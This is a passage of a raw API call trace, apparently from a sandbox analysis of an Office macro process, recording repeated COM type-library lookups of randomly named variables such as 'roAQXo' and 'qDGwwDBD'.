ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.151] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="roAQXo") returned 0x102bb8 [0069.151] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="roAQXo" | out: _Dst="roAQXo") returned 0x0 [0069.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="roAQXo") returned 7 [0069.151] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.151] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="roAQXo", lHashVal=0x102bb8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.151] IUnknown:Release (This=0x665ba50) returned 0xd [0069.151] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.151] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="roAQXo", lHashVal=0x102bb8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.151] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.151] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.151] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="roAQXo", lHashVal=0x102bb8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.152] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.152] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.152] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="roAQXo", lHashVal=0x102bb8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.152] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6277a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="roAQXo") returned 7 [0069.152] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="roAQXo", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.152] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.152] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6277a | out: _Dst=0x67c2d40) returned 0x0 [0069.152] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_roAQXo") returned 0x10a661 [0069.152] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_roAQXo" | out: _Dst="_B_var_roAQXo") returned 0x0 [0069.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_roAQXo") returned 14 [0069.152] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.152] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_roAQXo", lHashVal=0x10a661, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.152] IUnknown:Release (This=0x665ba50) returned 0xd [0069.152] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.152] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_roAQXo", lHashVal=0x10a661, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.152] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.152] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.152] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_roAQXo", lHashVal=0x10a661, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.152] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.152] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.152] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_roAQXo", lHashVal=0x10a661, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.152] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.152] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.152] IUnknown:Release (This=0x665ba50) returned 0xd [0069.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1154e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_roAQXo") returned 14 [0069.152] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_roAQXo", lHashVal=0x10a661, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x58005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x58005100000000, pDummy=0x0) returned 0x0 [0069.153] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6277a | out: _Dst=0x144ec0) returned 0x0 [0069.153] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qDGwwDBD", lHashVal=0x10ef86, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qDGwwDBD") returned 9 [0069.153] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qDGwwDBD", lHashVal=0x10ef86, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qDGwwDBD") returned 9 [0069.153] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qDGwwDBD", lHashVal=0x10ef86, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.153] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDGwwDBD") returned 0x10ef86 [0069.153] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qDGwwDBD" | out: _Dst="qDGwwDBD") returned 0x0 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qDGwwDBD") returned 9 [0069.153] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.153] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qDGwwDBD", lHashVal=0x10ef86, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.153] IUnknown:Release (This=0x665ba50) returned 0xd [0069.153] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.153] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qDGwwDBD", lHashVal=0x10ef86, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.153] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.153] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.153] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qDGwwDBD", lHashVal=0x10ef86, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.153] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.153] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.153] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qDGwwDBD", lHashVal=0x10ef86, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.153] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qDGwwDBD") returned 9 [0069.154] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qDGwwDBD", lHashVal=0x10ef86, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.154] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.154] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a627ca | out: _Dst=0x67c2d40) returned 0x0 [0069.154] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qDGwwDBD") returned 0x10c70f [0069.154] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qDGwwDBD" | out: _Dst="_B_var_qDGwwDBD") returned 0x0 [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qDGwwDBD") returned 16 [0069.154] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.154] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qDGwwDBD", lHashVal=0x10c70f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.154] IUnknown:Release (This=0x665ba50) returned 0xd [0069.154] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.154] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qDGwwDBD", lHashVal=0x10c70f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.154] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.154] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.154] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qDGwwDBD", lHashVal=0x10c70f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.154] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.154] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.154] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qDGwwDBD", lHashVal=0x10c70f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.154] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.154] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.154] IUnknown:Release (This=0x665ba50) returned 0xd [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1157e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_qDGwwDBD") returned 16 [0069.154] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qDGwwDBD", lHashVal=0x10c70f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0) returned 0x0 [0069.154] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a627ca | out: _Dst=0x144ec0) returned 0x0 [0069.155] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qDcADA", lHashVal=0x1002e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qDcADA") returned 7 [0069.155] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qDcADA", lHashVal=0x1002e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qDcADA") returned 7 [0069.155] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qDcADA", lHashVal=0x1002e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDcADA") returned 0x1002e6 [0069.155] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="qDcADA" | out: _Dst="qDcADA") returned 0x0 [0069.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="qDcADA") returned 7 [0069.155] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.155] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qDcADA", lHashVal=0x1002e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.155] IUnknown:Release (This=0x665ba50) returned 0xd [0069.155] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.155] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qDcADA", lHashVal=0x1002e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.155] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.155] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.155] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qDcADA", lHashVal=0x1002e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.155] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.155] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.155] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qDcADA", lHashVal=0x1002e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.155] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qDcADA") returned 7 [0069.155] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qDcADA", lHashVal=0x1002e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.155] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.156] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a627f6 | out: _Dst=0x67c2d40) returned 0x0 [0069.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qDcADA") returned 0x107d8f [0069.156] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_qDcADA" | out: _Dst="_B_var_qDcADA") returned 0x0 [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_qDcADA") returned 14 [0069.156] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.156] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qDcADA", lHashVal=0x107d8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.156] IUnknown:Release (This=0x665ba50) returned 0xd [0069.156] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.156] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qDcADA", lHashVal=0x107d8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.156] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.156] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.156] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qDcADA", lHashVal=0x107d8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.156] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.156] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.156] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qDcADA", lHashVal=0x107d8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.156] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.156] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.156] IUnknown:Release (This=0x665ba50) returned 0xd [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b115ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_qDcADA") returned 14 [0069.156] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qDcADA", lHashVal=0x107d8f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.156] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a627f6 | out: _Dst=0x144ec0) returned 0x0 [0069.156] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JUBBwAc", lHashVal=0x10475c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62846, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUBBwAc") returned 8 [0069.156] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JUBBwAc", lHashVal=0x10475c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62846, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUBBwAc") returned 8 [0069.157] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JUBBwAc", lHashVal=0x10475c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.157] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUBBwAc") returned 0x10475c [0069.157] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="JUBBwAc" | out: _Dst="JUBBwAc") returned 0x0 [0069.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="JUBBwAc") returned 8 [0069.157] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.157] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JUBBwAc", lHashVal=0x10475c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.157] IUnknown:Release (This=0x665ba50) returned 0xd [0069.157] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.157] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JUBBwAc", lHashVal=0x10475c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.157] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.157] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.157] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JUBBwAc", lHashVal=0x10475c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.157] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.157] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.157] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JUBBwAc", lHashVal=0x10475c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.157] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62846, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUBBwAc") returned 8 [0069.157] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JUBBwAc", lHashVal=0x10475c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.157] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.158] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62846 | out: _Dst=0x67c2d40) returned 0x0 [0069.158] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JUBBwAc") returned 0x104ae0 [0069.158] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_JUBBwAc" | out: _Dst="_B_var_JUBBwAc") returned 0x0 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_JUBBwAc") returned 15 [0069.158] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.158] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JUBBwAc", lHashVal=0x104ae0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.158] IUnknown:Release (This=0x665ba50) returned 0xd [0069.158] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.158] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JUBBwAc", lHashVal=0x104ae0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.158] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.158] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.158] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JUBBwAc", lHashVal=0x104ae0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.158] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.158] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.158] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JUBBwAc", lHashVal=0x104ae0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.158] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.158] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.158] IUnknown:Release (This=0x665ba50) returned 0xd [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b115de, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_JUBBwAc") returned 15 [0069.158] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JUBBwAc", lHashVal=0x104ae0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0) returned 0x0 [0069.158] _mbscpy_s (in: _Dst=0x144ec0, 